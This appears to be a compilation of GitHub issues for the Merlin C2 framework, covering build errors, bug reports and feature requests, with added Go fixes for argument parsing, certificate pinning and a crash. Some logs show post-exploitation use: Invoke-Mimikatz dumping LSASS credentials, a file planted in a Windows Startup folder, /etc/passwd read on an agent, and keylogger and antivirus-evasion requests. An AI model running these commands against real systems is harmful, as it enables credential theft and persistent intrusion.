-rwxr-xr-x 1 apple staff 7364608 Jan 4 13:13 merlinAgent-Linux-x64
-rwxr-xr-x 1 apple staff 7434240 Jan 4 13:13 merlinAgent-Windows-x64.exe
-rwxr-xr-x 1 apple staff 8664852 Jan 4 13:13 merlinServer-Darwin-x64
-rwxr-xr-x 1 apple staff 7898720 Jan 4 13:13 merlinServer-Linux-x64
-rwxr-xr-x 1 apple staff 7900672 Jan 4 13:13 merlinServer-Windows-x64.exe
I have a lot of golang code for agent features. I think these would best be implemented as modules. I was hoping you could make an example module so I could use it as a template for implementing more specialized agent features.
merlinagent/main.go var hostUUID = uuid.NewV4(), can't compile.
Using GoLand as the IDE
merlinserver/main.go
cmd/merlinserver/main.go:176:10: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:180:11: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:186:11: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:312:26: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in field value
cmd/merlinserver/main.go:317:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:318:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:319:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:320:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
cmd/merlinserver/main.go:321:8: cannot use j.ID (type "github.com/Ne0nd0g/merlin/vendor/github.com/satori/go.uuid".UUID) as type "github.com/satori/go.uuid".UUID in map index
Nice evasion for antivirus, but I need to download or upload files on the agent (victim). Thanks.
Expected to only see a single line response containing the grep output when running:
cmd cat /etc/passwd | grep root
Entire contents of /etc/passwd were returned.
Execute cmd cat /etc/passwd | grep root from the server for a Linux agent.
Agent debug information shows the command was received properly:
[DEBUG]Agent ID: ea3e4d2c-aae0-42e7-869b-2f0d826fb256
[DEBUG]Message Type: CmdPayload
[DEBUG]Message Payload: &{"executable":"cat","args":"/etc/passwd | grep root","job":"fyIdTQkQzH"}
[DEBUG]Received input parameter for executeCommand function: {cat /etc/passwd | grep root fyIdTQkQzH}
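Why the pipe was ignored, as an added example (not Merlin's code; that the agent splits the args string on whitespace and calls exec directly is an assumption consistent with the debug output above). exec.Command starts the program itself, so "|", "grep" and "root" reach cat as file names: cat prints the whole file, then complains about the three files it cannot find. A pipeline needs a shell, or Go-side plumbing between two commands. The passwd-style file below is constructed, not the real /etc/passwd:

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"strings"
)

// RunDirect mirrors an agent that splits the operator's argument string on
// whitespace and hands it to exec. No shell is involved, so "|" is just another
// argument and the pipeline never happens.
func RunDirect(executable, args string) (string, error) {
	out, err := exec.Command(executable, strings.Fields(args)...).CombinedOutput()
	return string(out), err
}

// RunViaShell hands the whole line to /bin/sh so pipes, redirects and globs
// behave as the operator expects. It is still a shell: anything in the line that
// came from the target rather than the operator needs quoting.
func RunViaShell(line string) (string, error) {
	out, err := exec.Command("/bin/sh", "-c", line).CombinedOutput()
	return string(out), err
}

// Demo writes a constructed passwd-style file and runs the issue's command both
// ways, returning both outputs. cat's non-zero exit in the direct case is
// deliberately ignored so its stdout can be shown.
func Demo() (direct, piped string, err error) {
	dir, err := os.MkdirTemp("", "merlin-pipe")
	if err != nil {
		return "", "", err
	}
	defer os.RemoveAll(dir)
	passwd := filepath.Join(dir, "passwd")
	sample := "root:x:0:0:root:/root:/bin/bash\nalice:x:1000:1000::/home/alice:/bin/sh\n"
	if err := os.WriteFile(passwd, []byte(sample), 0o600); err != nil {
		return "", "", err
	}
	direct, _ = RunDirect("cat", passwd+" | grep root")
	piped, err = RunViaShell("cat " + passwd + " | grep root")
	return direct, piped, err
}

func main() {
	direct, piped, err := Demo()
	fmt.Printf("direct exec:\n%s\nvia sh -c:\n%s\nerr=%v\n", direct, piped, err)
}
```

Handing the line to sh -c restores pipes but makes the shell parse the line; that is fine for operator input on a C2, but an agent that also shells out strings gathered on the target (a path from a directory listing, for instance) then needs to quote them.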
A keylogger/keystrokes is a nice feature! This script works fine, except when shift + char is pressed. Only '[Shift]' is logged... I don't know how to fix it. And this one (not tested).
Merlin agent uses a TLS configuration setting of InsecureSkipVerify: true that will permit communications with a server using an untrusted certificate. Initially this was by design to facilitate ease of use and allow operators the ability to use self-signed certificates.
Merlin Agent should be written so that, by default, it won't communicate with hosts using an untrusted certificate. A command line flag and/or build argument should be implemented to downgrade security to allow communications with a host using an untrusted certificate.
Alternatively, have the agent report back the certificate hash it believes it is communicating with and check it against the server's hash, even if using a self-signed certificate. If there is no match drop the communication or hold the agent in a quarantine state and allow the operator to decide how to proceed.
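The second proposal, pinning the server certificate while still allowing a self-signed one, as an added example (not Merlin's code; the function names are assumptions). InsecureSkipVerify stays on so no CA or hostname check runs, and VerifyPeerCertificate replaces it with an exact SHA-256 match on the leaf certificate's DER; Go hands the raw presented chain to that callback even when chain verification is skipped. A local httptest TLS server supplies the self-signed certificate:

```go
package main

import (
	"crypto/sha256"
	"crypto/tls"
	"crypto/x509"
	"encoding/hex"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
)

// Fingerprint returns the SHA-256 of the DER-encoded certificate: the value an
// operator copies from the server's data/x509 certificate into the agent build.
func Fingerprint(cert *x509.Certificate) string {
	sum := sha256.Sum256(cert.Raw)
	return hex.EncodeToString(sum[:])
}

// PinnedTLSConfig keeps InsecureSkipVerify so a self-signed certificate can be
// used, but replaces "trust anything" with an exact match on the leaf fingerprint.
func PinnedTLSConfig(expected string) *tls.Config {
	return &tls.Config{
		MinVersion:         tls.VersionTLS12,
		InsecureSkipVerify: true, // chain and hostname checks off; the pin below is the check
		VerifyPeerCertificate: func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
			if len(rawCerts) == 0 {
				return errors.New("server presented no certificate")
			}
			leaf, err := x509.ParseCertificate(rawCerts[0])
			if err != nil {
				return err
			}
			if got := Fingerprint(leaf); got != expected {
				return fmt.Errorf("certificate pin mismatch: got %s want %s", got, expected)
			}
			return nil
		},
	}
}

// Probe makes one request with the given TLS config and reports whether the
// handshake, including the pin check, succeeded.
func Probe(url string, cfg *tls.Config) error {
	client := &http.Client{Transport: &http.Transport{TLSClientConfig: cfg}}
	resp, err := client.Get(url)
	if err != nil {
		return err
	}
	resp.Body.Close()
	return nil
}

// Demo stands up a local self-signed TLS server and tries the pinned client
// against the right fingerprint and a wrong one.
func Demo() (rightErr, wrongErr error) {
	srv := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusOK)
	}))
	defer srv.Close()
	rightErr = Probe(srv.URL, PinnedTLSConfig(Fingerprint(srv.Certificate())))
	wrongErr = Probe(srv.URL, PinnedTLSConfig("deadbeef"))
	return rightErr, wrongErr
}

func main() {
	right, wrong := Demo()
	fmt.Println("correct pin:", right)
	fmt.Println("wrong pin:  ", wrong)
}
```

The fingerprint is a build-time or command-line input for the agent, so rotating the server certificate means re-keying agents; that is the intended property. The quarantine alternative in the issue would be the same callback recording the mismatch for the operator instead of returning an error.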
v0.7.0.BETA
1.12
Linux
When starting the Merlin server with a QUIC listener by specifying -proto hq, the Merlin Server would start and listen on port 443/UDP.
The Merlin Server just exits. The ListenAndServeTLS function returns the no such file or directory error. The source code was modified to retrieve this error. The error is in reference to the x509 certificate.
Start Merlin Server (i.e. ./merlinServer -proto hq)
The error seems to surround generating an x509 in-memory only certificate. A valid workaround is to generate an x509 key pair and save them in the data/x509 directory. This will prevent the listener from generating an error.
I'm trying to build the docker image from the git repo commit 2c1146f on Aug 20
I get an error about missing package quic-go/h2quic. I went to that github repo and it appears it has been renamed to http3.
sudo docker build -t merlin .
Password:
Sending build context to Docker daemon 34.51MB
Step 1/8 : FROM golang:stretch
---> 710c1c6c29c8
Step 2/8 : MAINTAINER @audibleblink
---> Using cache
---> d50866a17f1f
Step 3/8 : RUN apt-get update && apt-get install -y git make
---> Using cache
---> 34fef87fbca6
Step 4/8 : RUN go get github.com/Ne0nd0g/merlin/...
---> Running in 35c1eed65de2
package github.com/Ne0nd0g/merlin/cmd/merlinagent
imports github.com/lucas-clemente/quic-go/h2quic: cannot find package "github.com/lucas-clemente/quic-go/h2quic" in any of:
/usr/local/go/src/github.com/lucas-clemente/quic-go/h2quic (from $GOROOT)
/go/src/github.com/lucas-clemente/quic-go/h2quic (from $GOPATH)
The command '/bin/sh -c go get github.com/Ne0nd0g/merlin/...' returned a non-zero code: 1
I'm on Mac Darwin 18.7.0.
When running the agent and typing "help" the screen output formatting is garbled. Not at all like in the wiki example. I think it's because I am on Darwin?
Merlin» [-]Starting h2 listener on 127.0.0.1:443
x-MacBook-Pro:server apple$ GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin18)
These shell commands are defined internally. Type `help' to see this list.
Type `help name' to find out more about the function `name'.
Use `info bash' to find out more about the shell in general.
Use `man -k' or `info' to find out more about commands not in this list.
A star (*) next to a name means that the command is disabled.
JOB_SPEC [&] (( expression ))
. filename [arguments] :
[ arg... ] [[ expression ]]
alias [-p] [name[=value] ... ] bg [job_spec ...]
bind [-lpvsPVS] [-m keymap] [-f fi break [n]
builtin [shell-builtin [arg ...]] caller [EXPR]
case WORD in [PATTERN [| PATTERN]. cd [-L|-P] [dir]
command [-pVv] command [arg ...] compgen [-abcdefgjksuv] [-o option
complete [-abcdefgjksuv] [-pr] [-o continue [n]
declare [-afFirtx] [-p] [name[=val dirs [-clpv] [+N] [-N]
disown [-h] [-ar] [jobspec ...] echo [-neE] [arg ...]
enable [-pnds] [-a] [-f filename] eval [arg ...]
exec [-cl] [-a name] file [redirec exit [n]
export [-nf] [name[=value] ...] or false
fc [-e ename] [-nlr] [first] [last fg [job_spec]
for NAME [in WORDS ... ;] do COMMA for (( exp1; exp2; exp3 )); do COM
function NAME { COMMANDS ; } or NA getopts optstring name [arg]
hash [-lr] [-p pathname] [-dt] [na help [-s] [pattern ...]
history [-c] [-d offset] [n] or hi if COMMANDS; then COMMANDS; [ elif
jobs [-lnprs] [jobspec ...] or job kill [-s sigspec | -n signum | -si
let arg [arg ...] local name[=value] ...
logout popd [+N | -N] [-n]
printf [-v var] format [arguments] pushd [dir | +N | -N] [-n]
pwd [-LP] read [-ers] [-u fd] [-t timeout] [
readonly [-af] [name[=value] ...] return [n]
select NAME [in WORDS ... ;] do CO set [--abefhkmnptuvxBCHP] [-o opti
shift [n] shopt [-pqsu] [-o long-option] opt
source filename [arguments] suspend [-f]
test [expr] time [-p] PIPELINE
times trap [-lp] [arg signal_spec ...]
true type [-afptP] name [name ...]
typeset [-afFirtx] [-p] name[=valu ulimit [-SHacdfilmnpqstuvx] [limit
umask [-p] [-S] [mode] unalias [-a] name [name ...]
unset [-f] [-v] [name ...] until COMMANDS; do COMMANDS; done
variables - Some variable names an wait [n]
while COMMANDS; do COMMANDS; done { COMMANDS ; }
Windows 10 updates have broken the Get-ProcAddress function that is relied on by the Powershell Mafia module.
They are not updating the version of Invoke-Mimikatz in use by Merlin (see PowerShellMafia/PowerSploit#293).
I know I can import the working module manually but my suggestion is if it's going to be tracked from an external source anyways, might as well track a repo that gets updated frequently (eg, Empire https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1).
Merlin» agent list
+--------------------------------------+---------------+-----------------------+-----------------+-------------+--------+
| AGENT GUID | PLATFORM | USER | HOST | TRANSPORT | STATUS |
+--------------------------------------+---------------+-----------------------+-----------------+-------------+--------+
| 5adafe61-0827-49cc-a56b-fb83e1c4e803 | windows/amd64 | WIN-F7I54C7428A\mahdi | WIN-F7I54C7428A | HTTP/2 (h2) | Active |
| ffba5858-9d51-4e2b-8747-cc54b7c0360d | linux/amd64 | mahdi | ubuntu | HTTP/2 (h2) | Active |
+--------------------------------------+---------------+-----------------------+-----------------+-------------+--------+
Merlin» use module windows/x64/powershell/powersploit/Invoke-Mimikatz
Merlin[module][Invoke-Mimikatz]» show options
Agent: 00000000-0000-0000-0000-000000000000
Module options(Invoke-Mimikatz)
NAME | VALUE | REQUIRED | DESCRIPTION
+--------------+--------------------------------------+----------+--------------------------------+
Agent | 00000000-0000-0000-0000-000000000000 | true | Agent on which to run module
| | | Invoke-Mimikatz
DumpCreds | true | false | [Switch]Use mimikatz to dump
| | | credentials out of LSASS.
DumpCerts | | false | [Switch]Use mimikatz to export
| | | all private certificates
| | | (even if they are marked
| | | non-exportable).
Command | | false | Supply mimikatz a custom
| | | command line. This works
| | | exactly the same as running
| | | the mimikatz executable
| | | like this: mimikatz
| | | "privilege::debug exit" as an
| | | example.
ComputerName | | false | Optional, an array of
| | | computernames to run the
| | | script on.
Merlin[module][Invoke-Mimikatz]» set Agent 5adafe61-0827-49cc-a56b-fb83e1c4e803
[+]agent set to 5adafe61-0827-49cc-a56b-fb83e1c4e803
Merlin[module][Invoke-Mimikatz]» show options
Agent: 5adafe61-0827-49cc-a56b-fb83e1c4e803
Module options(Invoke-Mimikatz)
NAME | VALUE | REQUIRED | DESCRIPTION
+--------------+--------------------------------------+----------+--------------------------------+
Agent | 5adafe61-0827-49cc-a56b-fb83e1c4e803 | true | Agent on which to run module
| | | Invoke-Mimikatz
DumpCreds | true | false | [Switch]Use mimikatz to dump
| | | credentials out of LSASS.
DumpCerts | | false | [Switch]Use mimikatz to export
| | | all private certificates
| | | (even if they are marked
| | | non-exportable).
Command | | false | Supply mimikatz a custom
| | | command line. This works
| | | exactly the same as running
| | | the mimikatz executable
| | | like this: mimikatz
| | | "privilege::debug exit" as an
| | | example.
ComputerName | | false | Optional, an array of
| | | computernames to run the
| | | script on.
Merlin[module][Invoke-Mimikatz]» run
[-]Created job GgVSoTEoZE for agent 5adafe61-0827-49cc-a56b-fb83e1c4e803 at 2019-04-17T05:11:22Z
Merlin[module][Invoke-Mimikatz]» [!]There was an error during an Agent StatusCheckIn:
invalid job type, sending ServerOK
please help me
Using a hash table to map from alias string to UUID in server local storage.
Upload a file from Server to Agent (Filepath includes spaces!)
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]»
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]» upload pwnd.png C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwnd.png
[-]Created job xjMiCcHfxU for agent ad27de92-39fe-4b6f-b061-6ebb7a8e7365
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]» [+]Results for job xjMiCcHfxU
[+]Successfully uploaded file to C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start on agent ad27de92-39fe-4b6f-b061-6ebb7a8e7365
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]»
Merlin is just using the path "C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start"
Quotation marks are also not working:
upload pwnd.png "C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwnd.png"
[-]Created job QdCJkcbzmt for agent ad27de92-39fe-4b6f-b061-6ebb7a8e7365
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]» [+]Results for job QdCJkcbzmt
[!]There was an error getting the FileInfo structure for the remote directory "C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start:
CreateFile "C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows: Die Syntax für den Dateinamen, Verzeichnisnamen oder die Datenträgerbezeichnung ist falsch.
Just upload a file to a location with spaces in the path.
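The upload command above is split on whitespace, so a destination path containing a space is truncated at the first space and surrounding double quotes are passed through literally. As an added example (not Merlin's own code), the following tokenizer shows how a CLI argument splitter can honour double quotes while keeping backslashes literal so Windows paths survive; the function name `splitArgs` and the sample path are assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// splitArgs splits a CLI line into arguments: runs of whitespace separate
// arguments, double quotes group text (including spaces) into one argument,
// and backslashes are kept literally so Windows paths are not mangled.
// An unterminated quote is reported instead of silently guessing.
func splitArgs(line string) ([]string, error) {
	var args []string
	var cur strings.Builder
	inQuote := false
	hasToken := false // distinguishes "" (an empty quoted argument) from nothing
	for _, r := range line {
		switch {
		case r == '"':
			inQuote = !inQuote
			hasToken = true
		case !inQuote && (r == ' ' || r == '\t'):
			if hasToken {
				args = append(args, cur.String())
				cur.Reset()
				hasToken = false
			}
		default:
			cur.WriteRune(r)
			hasToken = true
		}
	}
	if inQuote {
		return nil, fmt.Errorf("unterminated double quote in: %q", line)
	}
	if hasToken {
		args = append(args, cur.String())
	}
	return args, nil
}

func main() {
	// Constructed example line; the destination path contains a space.
	args, err := splitArgs(`upload pwnd.png "C:\Program Files\Example\pwnd.png"`)
	fmt.Printf("%q %v\n", args, err)
}
```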
At https://github.com/Ne0nd0g/merlin/wiki/Building-or-Running-from-Source the instructions have a small error: they say to use the flag main.URL, but it needs to be main.url in lowercase.
compiling DLL from source
frank@ubuntu:~/merlin/data/bin/dll$ go build -buildmode=c-archive ../../../cmd/merlinagentdll/main.go
../../../cmd/merlinagentdll/main.go:28:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/agent" in any of:
/usr/local/go/src/github.com/Ne0nd0g/merlin/pkg/agent (from $GOROOT)
/home/frank/merlin/src/github.com/Ne0nd0g/merlin/pkg/agent (from $GOPATH)
There is no src/github.com/Ne0nd0g directory in the repository?
Add a command to Merlin Server to prompt the user to verify when using the exit command. This will prevent a user from accidentally shutting down the server by providing a validation check.
Add the ability to issue a jobs command and see all jobs per agent along with their status. Some statuses could include:
created - This is when the job has been entered into the server but not sent to the agent
sent - This is when the job has been sent to the agent from the server
0.6.6.BETA
nonRelease
1.11.2
Ubuntu
Show agent information
panic: runtime error: invalid memory address or nil pointer dereference
Instruct an agent to exit by issuing the kill command from the agent menu. Immediately try to interact with it again after it has been removed by issuing the info command.
Merlin» sessions
+--------------------------------------+-------------+------+--------+-------------+--------+
| AGENT GUID | PLATFORM | USER | HOST | TRANSPORT | STATUS |
+--------------------------------------+-------------+------+--------+-------------+--------+
| 8caa6f6c-0a56-466e-acfc-519d487fb2fe | linux/amd64 | tim | ABC001 | HTTP/2 (h2) | Active |
+--------------------------------------+-------------+------+--------+-------------+--------+
Merlin» interact 8caa6f6c-0a56-466e-acfc-519d487fb2fe
Merlin[agent][8caa6f6c-0a56-466e-acfc-519d487fb2fe]» [i]Agent 8caa6f6c-0a56-466e-acfc-519d487fb2fe was removed from the server
Merlin[agent][8caa6f6c-0a56-466e-acfc-519d487fb2fe]» info
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0xe0 pc=0x5944ba]
goroutine 20 [running]:
github.com/Ne0nd0g/merlin/pkg/agents.GetAgentStatus(0x6e46560a6c6faa8c, 0xfeb27f489d51fcac, 0xc000079800, 0x43455c)
/home/tim/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:549 +0x6a
github.com/Ne0nd0g/merlin/pkg/agents.ShowInfo(0x6e46560a6c6faa8c, 0xfeb27f489d51fcac)
/home/tim/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:291 +0x77
github.com/Ne0nd0g/merlin/pkg/cli.Shell()
/home/tim/go/src/github.com/Ne0nd0g/merlin/pkg/cli/cli.go:363 +0x1617
created by main.main
/home/tim/go/src/github.com/Ne0nd0g/merlin/cmd/merlinserver/main.go:67 +0x481
exit status 2
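The trace shows GetAgentStatus dereferencing an agent entry that was already deleted from the server's map. As an added example (not Merlin's own code), this small registry uses the two-value map lookup and returns an error for a removed agent instead of panicking; the type and function names are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"sync"
)

// ErrAgentNotFound is returned instead of dereferencing a missing entry.
var ErrAgentNotFound = errors.New("agent is not registered with the server")

type agent struct {
	ID     string
	Status string
}

// registry maps agent IDs to agents; the mutex guards the CLI goroutine and
// check-in goroutines that add and remove entries concurrently.
type registry struct {
	mu     sync.RWMutex
	agents map[string]*agent
}

func newRegistry() *registry { return &registry{agents: make(map[string]*agent)} }

func (r *registry) add(a *agent) { r.mu.Lock(); r.agents[a.ID] = a; r.mu.Unlock() }

// remove drops an agent after it has been told to exit (the "kill" path).
func (r *registry) remove(id string) { r.mu.Lock(); delete(r.agents, id); r.mu.Unlock() }

// status checks the lookup's ok flag so a removed agent yields an error
// rather than a nil pointer dereference.
func (r *registry) status(id string) (string, error) {
	r.mu.RLock()
	a, ok := r.agents[id]
	r.mu.RUnlock()
	if !ok {
		return "", fmt.Errorf("%s: %w", id, ErrAgentNotFound)
	}
	return a.Status, nil
}

func main() {
	r := newRegistry()
	r.add(&agent{ID: "8caa6f6c-0a56-466e-acfc-519d487fb2fe", Status: "Active"})
	r.remove("8caa6f6c-0a56-466e-acfc-519d487fb2fe") // agent menu "kill"
	if _, err := r.status("8caa6f6c-0a56-466e-acfc-519d487fb2fe"); err != nil {
		fmt.Println("info:", err) // reported to the operator instead of a SIGSEGV
	}
}
```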